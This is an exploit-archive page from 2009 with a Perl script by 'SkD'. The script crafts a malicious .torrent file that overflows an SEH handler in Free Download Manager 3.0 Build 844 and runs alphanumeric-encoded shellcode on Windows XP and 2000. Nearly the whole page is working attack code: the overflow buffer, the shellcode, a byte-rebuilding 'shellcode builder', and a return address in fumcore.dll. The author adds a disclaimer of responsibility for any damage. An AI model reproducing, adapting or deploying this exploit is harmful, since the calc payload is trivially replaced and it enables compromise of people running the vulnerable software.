Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit
# Published : 2009-02-03
# Author : SkD
# Previous Title : BlazeVideo HDTV Player <= 3.5 PLF Playlist File Remote Overflow Exploit
# Next Title : Euphonics Audio Player v1.0 (.pls) Local Buffer Overflow Exploit
#!/usr/bin/perl
#
# Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit
# -----------------------------------------------------------
# Exploit by SkD 			 (skdrat@hotmail.com)
#
# Vendors URL =
# [www.freedownloadmanager.org]
# Download FDM 3.0 Build 844 =
# [http://www.download.com/Free-Download-Manager/3000-2071_4-10301621.html]
# (Downloaded by over 1.6 million users!)
#
# This is another one of the more advanced exploitation methods
# for buffer overflows using my method called "shell building".
# It utilizes a SEH overflow and then a shellcode builder/assembler
# "builds"/or "assembles" bytes that were deleted by transformation
# of the buffer so that the shellcode will work without a flaw.
# I have been able to do this because of my recent experiences with
# UNICODE based overflows (heap & stack). This is a demonstration
# of how you can obtain power with limitations to buffer.
# Of course I could have used my shellhunting technique,
# but this is a new method, and to demonstrate it in a world of
# dying buffer overflows is important for me.
#
# Unfortunately I did not have time to make this a universal exploit
# so it will only work on all NT systems EXCEPT Vista (due to randomized
# heap, etc). But with a few modifications it can work (sure of it).
# Read my notes & comments in the script for more info.
#
# Tested on Windows XP SP3 (Fully Patched) & Windows 2000 SP4.
#
# Note: Author has no responsibility over the damage you do with this!

use strict;
use warnings;

my $tdata1 = "x64x38x3Ax61x6Ex6Ex6Fx75x6Ex63x65x31x32x3Ax41x41x41x41x41x41x41x41x41x41x41x41x37x3Ax63x6Fx6D".
	     "x6Dx65x6Ex74x31x32x3Ax63x6Fx6Dx6Dx65x6Ex74x74x74x74x74x74x31x33x3Ax63x72x65x61x74x69x6Fx6Ex20".
	     "x64x61x74x65x69x31x32x33x33x36x31x36x35x30x37x65x34x3Ax69x6Ex66x6Fx64x36x3Ax6Cx65x6Ex67x74x68".
	     "x69x39x31x37x33x34x65x34x3Ax6Ex61x6Dx65x31x32x39x39x39x3A";
my $tdata2 = "x31x32x3Ax70x69x65x63x65x20x6Cx65x6Ex67x74x68x69x32x36x32x31x34x34x65x36x3Ax70x69x65x63x65x73".
	     "x32x30x3Ax10x7FxD5x50xE2x70xA5x80x61x42x7Bx53x08xE0xCExFEx9CxDAx2ExE1x65x65";

# win32_exec -  EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"x01xebx03x59x01xebx05x01xe8x01xf8x01xffx01xffx01xffx4fx49x49x49x49x49".
#Notice I added 0x01 byte before each 0x80=> byte.
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34".
"x42x30x42x50x42x30x4bx58x45x44x4ex43x4bx38x4ex47".
"x45x50x4ax37x41x50x4fx4ex4bx58x4fx54x4ax51x4bx38".
"x4fx45x42x42x41x50x4bx4ex49x54x4bx38x46x53x4bx48".
"x41x30x50x4ex41x43x42x4cx49x59x4ex4ax46x48x42x4c".
"x46x37x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e".
"x46x4fx4bx43x46x55x46x32x46x30x45x57x45x4ex4bx48".
"x4fx35x46x32x41x50x4bx4ex48x56x4bx58x4ex50x4bx44".
"x4bx48x4fx55x4ex31x41x30x4bx4ex4bx38x4ex41x4bx58".
"x41x30x4bx4ex49x48x4ex55x46x52x46x50x43x4cx41x33".
"x42x4cx46x36x4bx48x42x34x42x53x45x58x42x4cx4ax37".
"x4ex50x4bx58x42x34x4ex30x4bx58x42x57x4ex31x4dx4a".
"x4bx58x4ax46x4ax30x4bx4ex49x50x4bx38x42x58x42x4b".
"x42x50x42x30x42x30x4bx58x4ax36x4ex53x4fx35x41x53".
"x48x4fx42x36x48x35x49x38x4ax4fx43x38x42x4cx4bx37".
"x42x35x4ax36x50x47x4ax4dx44x4ex43x37x4ax56x4ax59".
"x50x4fx4cx48x50x30x47x45x4fx4fx47x4ex43x36x41x56".
"x4ex36x43x46x42x30x5a";

#This is the shellcode builder or assembler. It gets the location of the shellcode and then from there does
#the appropriate modifications to apply the correct hex bytes that were deleted off the buffer (0x80=> bytes).
#You can only use the Alpha numerical shellcodes for the Shellcode builder ;), but remember to add
#0x01 before each 0x80=> byte.
my $shellcode_builder = ("x59" x 3 ."x40" x 9 . "x51x5b"."x4b" x 4 ."x01x03"."x48" x 10 ."x43x01x03" x 3).
			("x4b" x 3 ."x03x0b" x 35 ."x41" x 14 ."x41x01x01x01x01"."x41x01x01" x 2).
                        ("x49" x 3 ."x48"."x01x01" x 5 ."x40" x 3 ."x01x01x41x01x01").
                        ("x49" x 2 ."x48" x 3 ."x01x01" x 13 ."x40" x 3 ."x01x01x41x01x01").
                        ("x49" x 3 ."x48" x 3 ."x01x01" x 11 ."x49" x 3 ."x01x01" x 11).
                        ("x40" x 3 ."x41x01x01"."x41" x 3 ."x01x01"."x41" x 6 ."x01x01");
my $len = 12999 - (10000 + (350 - length($shellcode_builder)) + length($shellcode) + 12 + length($shellcode_builder)); #Really important calculation to overflow the stack													       #and set everything in the right places(ret,addr,etc).
my $shellcode_builder_label = "x01x01x01x01"; #Used as a 'label' to create a DWORD 0x0000000a used in a calculation to get shellcode location.
my $overflow1 = "x41" x 10000;
my $overflow2 = "x41" x $len;
my $sled = "x41" x (350 - length($shellcode_builder));
my $sehjmp = "x71x06x01x01"; #Since we cannot use 0xEB, I am going to use another type of jump ;)
my $sehret = "x1ax09x03x10"; #0x1003091A fumcore.dll POP ESI, POP EDI, RETN (For XP <= Systems)

open(my $torrent, "> s.torrent");
print $torrent $tdata1.
	       $overflow1.$shellcode_builder_label.$sehjmp.$sehret.$shellcode_builder.$sled.$shellcode.$overflow2.
               $tdata2;
close $torrent;

# www.Syue.com [2009-02-03]